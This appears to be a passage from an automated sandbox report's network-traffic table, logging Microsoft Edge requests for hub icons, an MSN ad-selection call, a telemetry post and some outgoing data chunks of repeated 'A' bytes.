2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49804	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	523	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 4fd2710b-801e-0076-7851-42ecbb000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f7845968frfdmhC1EWRxxbw0000000zw0000000005d1y Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:09 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49806	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	523	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 3263fcdc-101e-0073-0951-4218c4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f7845968cdxdrhC1EWRg0en0000000ztg0000000057m6 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:09 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49808	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	516	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: daf02171-701e-0005-6651-429c78000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f7845968vqt9xhC1EWRgten00000010000000000016rt Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:09 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49803	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:09 UTC	516	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 74130341-f01e-001f-0e51-42b317000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f78459685m244hC1EWRgp2c0000000zn0000000006y4p Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:09 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49805	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:08 UTC	523	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: c815b823-b01e-0075-3b51-42efbc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f7845968jrjrxhC1EWRmmrs000000102g000000001nzk Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:08 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49807	13.107.246.40	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:08 UTC	536	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:08 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 183e4b7d-201e-0016-4bfb-41a999000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112808Z-174f784596886s2bhC1EWR743w000000100g000000000cuu Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-29 11:28:08 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49810	23.96.180.189	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	1068	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0D52E8701DB86AF23F08FD361CDF6BCA&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=67eacb04cb224a189347e7c63ff0bcc8 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1
2024-11-29 11:28:09 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Fri, 29 Nov 2024 11:28:09 GMT Connection: close
2024-11-29 11:28:09 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49809	13.69.116.108	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:09 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879686231&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3782 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1
